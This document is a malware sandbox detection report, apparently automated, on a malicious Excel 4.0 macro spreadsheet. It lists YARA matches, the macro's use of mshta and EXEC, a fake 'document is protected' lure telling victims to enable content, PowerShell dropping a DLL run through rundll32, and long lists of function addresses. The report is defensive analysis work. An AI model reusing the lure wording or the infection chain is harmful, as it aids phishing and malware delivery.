Source: Yara match	File source: 0000000F.00000002.656380451.0000000000340000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.656726745.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.602710616.0000000002930000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.602062854.00000000006D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.496880032.0000000000770000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.548085066.0000000002E31000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.548199162.0000000002F41000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.605017420.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.549940138.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.602269654.0000000000870000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.602677407.0000000002901000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.602340992.00000000020A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.602833934.0000000002E01000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.602929583.0000000002E30000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.658681536.0000000000140000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.549782146.0000000000641000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\ProgramData\JooSee.dll, type: DROPPED

System Summary

Found malicious Excel 4.0 Macro

Source: 1162545482187818.xls	Macro extractor: Sheet: REEEEEEEE contains: mshta
Source: 1162545482187818.xls	Macro extractor: Sheet: REEEEEEEE contains: mshta

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 C
Source: Screenshot number: 4	Screenshot OCR: DOCUMENT IS PROTECTED. 10 11 12 13 Previewing is not available for protected documents. 14 15
Source: Screenshot number: 4	Screenshot OCR: protected documents. 14 15 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
Source: Screenshot number: 4	Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 Ci [.I 23 24 25 26
Source: Document image extraction number: 0	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0	Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 0	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0	Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1	Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1	Screenshot OCR: ENABLE CONTENT" buttons to preview this document.

Document contains OLE streams with names of living off the land binaries

Source: 1162545482187818.xls	Stream path 'Workbook' : ........ZO..........................\.p....xXx B.....a.........=...........................................=........p.08.......X.@...........".......................1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1..h...6........<..C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6........<..C.a.l.i.b.r.i.1.......6........<..C.a.l.i.b.r.i.1.......6........<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1.......<........<..C.a.l.i.b.r.i.1.......>........<..C.a.l.i.b.r.i.1.......?........<..C.a.l.i.b.r.i.1.......4........<..C.a.l.i.b.r.i.1.......4........<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..A.r.i.a.l...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q..6.._.-.. .#.,.#.#.0.\. .".. "._.-.;.\.-.. .#.,.#.#.0.\. .".. "._.-.;._.-.. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._- #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._- #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-..?...:.._("$"* #,##0.00_);_("$"* $#,##0.00$;_("$"* "-"??_);_(@_).......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ...ff....... ......+... ............ ......)... ............ ......,... ............ ......*... ............ .......... ............ .......... ............ .......... ............ .......... ....P....... .......... ....P....... .......
Source: 1162545482187818.xls.0.dr	Stream path 'Workbook' : ........ZO..........................\.p....user B.....a.........=...........................................=........p.08.......X.@...........".......................1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1..h...6........<..C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6........<..C.a.l.i.b.r.i.1.......6........<..C.a.l.i.b.r.i.1.......6........<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1.......<........<..C.a.l.i.b.r.i.1.......>........<..C.a.l.i.b.r.i.1.......?........<..C.a.l.i.b.r.i.1.......4........<..C.a.l.i.b.r.i.1.......4........<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..A.r.i.a.l...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q..6.._.-.. .#.,.#.#.0.\. .".. "._.-.;.\.-.. .#.,.#.#.0.\. .".. "._.-.;._.-.. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._- #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._- #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-..?...:.._("$"* #,##0.00_);_("$"* $#,##0.00$;_("$"* "-"??_);_(@_).......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ...ff....... ......+... ............ ......)... ............ ......,... ............ ......*... ............ .......... ............ .......... ............ .......... ............ .......... ....P....... .......... ....P....... .......

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\ProgramData\JooSee.dll

Jump to dropped file

Found Excel 4.0 Macro with suspicious formulas

Source: 1162545482187818.xls	Initial sample: EXEC
Source: 1162545482187818.xls	Initial sample: EXEC

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_10036007	9_2_10036007
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_10041050	9_2_10041050
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_1003130F	9_2_1003130F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_100323E2	9_2_100323E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_10030460	9_2_10030460
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_10041592	9_2_10041592
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_1003E59F	9_2_1003E59F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_1003960C	9_2_1003960C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_100317E2	9_2_100317E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_10040B0E	9_2_10040B0E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_10031BB6	9_2_10031BB6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_10041C56	9_2_10041C56
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_10036CB5	9_2_10036CB5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_1001CD16	9_2_1001CD16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_10042D21	9_2_10042D21
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_10031FC2	9_2_10031FC2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007AF8FD	9_2_007AF8FD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007AE991	9_2_007AE991
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007AAB87	9_2_007AAB87
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007B907F	9_2_007B907F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007C0056	9_2_007C0056
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007A2051	9_2_007A2051
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007A9011	9_2_007A9011
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007B0001	9_2_007B0001
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007B20BA	9_2_007B20BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007A70B3	9_2_007A70B3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007AF09B	9_2_007AF09B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007B4116	9_2_007B4116
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007A51BB	9_2_007A51BB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007A81B7	9_2_007A81B7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007A2251	9_2_007A2251
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007BA2E8	9_2_007BA2E8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007AE2CC	9_2_007AE2CC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007AB2C7	9_2_007AB2C7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007A5361	9_2_007A5361
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007A4346	9_2_007A4346
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007C13AD	9_2_007C13AD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007BC3A0	9_2_007BC3A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007BE395	9_2_007BE395
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007BD389	9_2_007BD389
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007B044F	9_2_007B044F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007BF435	9_2_007BF435
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007A64E2	9_2_007A64E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007AA55F	9_2_007AA55F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007B2550	9_2_007B2550
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007A5548	9_2_007A5548
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007B8519	9_2_007B8519
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007B95FA	9_2_007B95FA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007AE5CF	9_2_007AE5CF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007BA666	9_2_007BA666
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007BC631	9_2_007BC631
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007B8606	9_2_007B8606
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007AD6D8	9_2_007AD6D8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007B66CA	9_2_007B66CA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007B176B	9_2_007B176B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007AB74D	9_2_007AB74D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007B473C	9_2_007B473C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007A7735	9_2_007A7735
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007A9714	9_2_007A9714
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007A4816	9_2_007A4816
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007B1889	9_2_007B1889
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007A8969	9_2_007A8969
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007B894B	9_2_007B894B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007A59F2	9_2_007A59F2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007C09B5	9_2_007C09B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007A1A56	9_2_007A1A56
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007BAA30	9_2_007BAA30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007AEA99	9_2_007AEA99
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007ABB7E	9_2_007ABB7E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007BCB5B	9_2_007BCB5B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007A8B3D	9_2_007A8B3D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007BBB23	9_2_007BBB23
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007B0B19	9_2_007B0B19
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007BDBEA	9_2_007BDBEA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007B8BE3	9_2_007B8BE3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007A2BD9	9_2_007A2BD9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007B9BCF	9_2_007B9BCF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007B7BA6	9_2_007B7BA6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007A9B83	9_2_007A9B83
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007B4B87	9_2_007B4B87
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007A4C5D	9_2_007A4C5D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007B6C49	9_2_007B6C49
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007BAC3A	9_2_007BAC3A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007A3C3C	9_2_007A3C3C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007A7C37	9_2_007A7C37
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007C0C14	9_2_007C0C14
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007BDCF7	9_2_007BDCF7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007B5CC4	9_2_007B5CC4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007A6D24	9_2_007A6D24
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007B6DF8	9_2_007B6DF8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007B7DD5	9_2_007B7DD5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007A9DCF	9_2_007A9DCF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007BAE6D	9_2_007BAE6D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007A5E60	9_2_007A5E60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007B0E53	9_2_007B0E53
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007A3E3F	9_2_007A3E3F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007C0E3A	9_2_007C0E3A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007BBE27	9_2_007BBE27
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007AAEFB	9_2_007AAEFB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007B9EEC	9_2_007B9EEC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007A4EE3	9_2_007A4EE3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007BDEDC	9_2_007BDEDC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007AEE81	9_2_007AEE81
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007ACF47	9_2_007ACF47
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007C0F33	9_2_007C0F33
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007A7FF2	9_2_007A7FF2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007ADFF3	9_2_007ADFF3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00383C3C	10_2_00383C3C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00389011	10_2_00389011
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0039044F	10_2_0039044F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003920BA	10_2_003920BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0038F8FD	10_2_0038F8FD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0038D6D8	10_2_0038D6D8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00394116	10_2_00394116
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A13AD	10_2_003A13AD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0038AB87	10_2_0038AB87
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003995FA	10_2_003995FA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00387FF2	10_2_00387FF2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003859F2	10_2_003859F2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A0E3A	10_2_003A0E3A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0039AC3A	10_2_0039AC3A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00383E3F	10_2_00383E3F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0039C631	10_2_0039C631
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0039AA30	10_2_0039AA30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0039F435	10_2_0039F435
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00387C37	10_2_00387C37
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0039BE27	10_2_0039BE27
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00384816	10_2_00384816
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A0C14	10_2_003A0C14
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00390001	10_2_00390001
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00398606	10_2_00398606
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0039907F	10_2_0039907F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0039AE6D	10_2_0039AE6D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00385E60	10_2_00385E60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0039A666	10_2_0039A666
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00384C5D	10_2_00384C5D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00382051	10_2_00382051
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00382251	10_2_00382251
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00390E53	10_2_00390E53
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A0056	10_2_003A0056
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00381A56	10_2_00381A56
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00396C49	10_2_00396C49
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003870B3	10_2_003870B3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0038EA99	10_2_0038EA99
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0038F09B	10_2_0038F09B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00391889	10_2_00391889
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0038EE81	10_2_0038EE81
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0038AEFB	10_2_0038AEFB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0039DCF7	10_2_0039DCF7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0039A2E8	10_2_0039A2E8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00399EEC	10_2_00399EEC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003864E2	10_2_003864E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00384EE3	10_2_00384EE3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0039DEDC	10_2_0039DEDC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003966CA	10_2_003966CA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0038E2CC	10_2_0038E2CC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00395CC4	10_2_00395CC4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0038B2C7	10_2_0038B2C7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0039473C	10_2_0039473C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00388B3D	10_2_00388B3D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A0F33	10_2_003A0F33
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00387735	10_2_00387735
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0039BB23	10_2_0039BB23
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00386D24	10_2_00386D24
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00398519	10_2_00398519
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00390B19	10_2_00390B19
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00389714	10_2_00389714
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0038BB7E	10_2_0038BB7E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00388969	10_2_00388969
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0039176B	10_2_0039176B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00385361	10_2_00385361
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0039CB5B	10_2_0039CB5B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0038A55F	10_2_0038A55F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00392550	10_2_00392550
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00385548	10_2_00385548
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0039894B	10_2_0039894B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0038B74D	10_2_0038B74D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00384346	10_2_00384346
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0038CF47	10_2_0038CF47
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003851BB	10_2_003851BB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A09B5	10_2_003A09B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003881B7	10_2_003881B7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0039C3A0	10_2_0039C3A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00397BA6	10_2_00397BA6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0038E991	10_2_0038E991
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0039E395	10_2_0039E395
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0039D389	10_2_0039D389
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00389B83	10_2_00389B83
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00394B87	10_2_00394B87
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00396DF8	10_2_00396DF8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0038DFF3	10_2_0038DFF3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0039DBEA	10_2_0039DBEA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00398BE3	10_2_00398BE3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00382BD9	10_2_00382BD9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00397DD5	10_2_00397DD5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00399BCF	10_2_00399BCF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00389DCF	10_2_00389DCF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0038E5CF	10_2_0038E5CF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_10036007	11_2_10036007
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_10041050	11_2_10041050
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_1003130F	11_2_1003130F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_100323E2	11_2_100323E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_10030460	11_2_10030460
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_10041592	11_2_10041592
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_1003E59F	11_2_1003E59F
